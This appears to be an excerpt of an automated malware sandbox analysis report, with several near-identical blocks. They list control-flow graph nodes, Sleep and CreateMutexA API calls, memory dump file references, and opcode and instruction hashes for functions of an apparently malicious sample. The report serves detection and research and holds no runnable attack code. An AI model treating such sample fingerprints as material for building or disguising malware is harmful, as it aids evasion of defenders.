                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: d137ee3902fbb5315e70ffeb5bf1d272488342137d26a033d91f6c28bb44b817
                                                                                                                                                                                                                                          • Instruction ID: 963a60f938ff02db050d48fa007cb88633234363cc3a5d639ce77cb9ecaa919f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d137ee3902fbb5315e70ffeb5bf1d272488342137d26a033d91f6c28bb44b817
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26313931605144EBEB189BBDDC89B6CB762EFCA314F244218E054DB3D2D77DA9818712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 387 7ea682-7ea6a2 391 7ea6a4-7ea6b0 387->391 392 7ea6d0-7ea6ec 387->392 395 7ea6c6-7ea6cd call 7fd663 391->395 396 7ea6b2-7ea6c0 391->396 393 7ea6ee-7ea6fa 392->393 394 7ea71a-7ea739 392->394 399 7ea6fc-7ea70a 393->399 400 7ea710-7ea717 call 7fd663 393->400 401 7ea73b-7ea747 394->401 402 7ea767-7ea916 call 7f80c0 394->402 395->392 396->395 397 7ea949 396->397 405 7ea94e 397->405 406 7ea949 call 816c6a 397->406 399->397 399->400 400->394 408 7ea75d-7ea764 call 7fd663 401->408 409 7ea749-7ea757 401->409 410 7ea953-7ea994 Sleep CreateMutexA 405->410 411 7ea94e call 816c6a 405->411 406->405 408->402 409->397 409->408 419 7ea996-7ea998 410->419 420 7ea9a7-7ea9a8 410->420 411->410 419->420 421 7ea99a-7ea9a5 419->421 421->420
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: e914c74b05579ec70d34ba2b6fce4fbcfea45860b1c0f6e77c510b65dd82268d
                                                                                                                                                                                                                                          • Instruction ID: 2f33c9f9e20b84599b773f31355c0b3a238adc59867b4db18bc2954fced382d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e914c74b05579ec70d34ba2b6fce4fbcfea45860b1c0f6e77c510b65dd82268d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C314831605184EBEB18DBBDDD89B6DB7B2EFCA310F248618E014DB3D2D77D69808652

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 423 7e9adc-7e9ae8 424 7e9afe-7e9b27 call 7fd663 423->424 425 7e9aea-7e9af8 423->425 432 7e9b29-7e9b35 424->432 433 7e9b55-7e9b57 424->433 425->424 426 7ea917 425->426 428 7ea953-7ea994 Sleep CreateMutexA 426->428 429 7ea917 call 816c6a 426->429 439 7ea996-7ea998 428->439 440 7ea9a7-7ea9a8 428->440 429->428 435 7e9b4b-7e9b52 call 7fd663 432->435 436 7e9b37-7e9b45 432->436 437 7e9b59-7ea916 call 7f80c0 433->437 438 7e9b65-7e9d91 call 7f7a00 call 7e5c10 call 7e8b30 call 7f8220 call 7f7a00 call 7e5c10 call 7e8b30 call 7f8220 433->438 435->433 436->426 436->435 439->440 444 7ea99a-7ea9a5 439->444 444->440
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 59c88ab9e9f6bb15218713d1ff8c23d5b7789b12c5eceb94f4326d73b4d659ba
                                                                                                                                                                                                                                          • Instruction ID: 56595060ec567b9204b3e041a0e568ef11448d68962a1e48af74594e3190336f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59c88ab9e9f6bb15218713d1ff8c23d5b7789b12c5eceb94f4326d73b4d659ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08214932605280EBFB189BADEC8976DF762EFC5310F20421DE554C73D6EBBD69818612

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 500 7ea856-7ea86e 501 7ea89c-7ea89e 500->501 502 7ea870-7ea87c 500->502 505 7ea8a9-7ea8b1 call 7e7d30 501->505 506 7ea8a0-7ea8a7 501->506 503 7ea87e-7ea88c 502->503 504 7ea892-7ea899 call 7fd663 502->504 503->504 507 7ea94e 503->507 504->501 517 7ea8e4-7ea8e6 505->517 518 7ea8b3-7ea8bb call 7e7d30 505->518 509 7ea8eb-7ea916 call 7f80c0 506->509 511 7ea953-7ea987 Sleep CreateMutexA 507->511 512 7ea94e call 816c6a 507->512 519 7ea98e-7ea994 511->519 512->511 517->509 518->517 524 7ea8bd-7ea8c5 call 7e7d30 518->524 522 7ea996-7ea998 519->522 523 7ea9a7-7ea9a8 519->523 522->523 525 7ea99a-7ea9a5 522->525 524->517 529 7ea8c7-7ea8cf call 7e7d30 524->529 525->523 529->517 532 7ea8d1-7ea8d9 call 7e7d30 529->532 532->517 535 7ea8db-7ea8e2 532->535 535->509
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
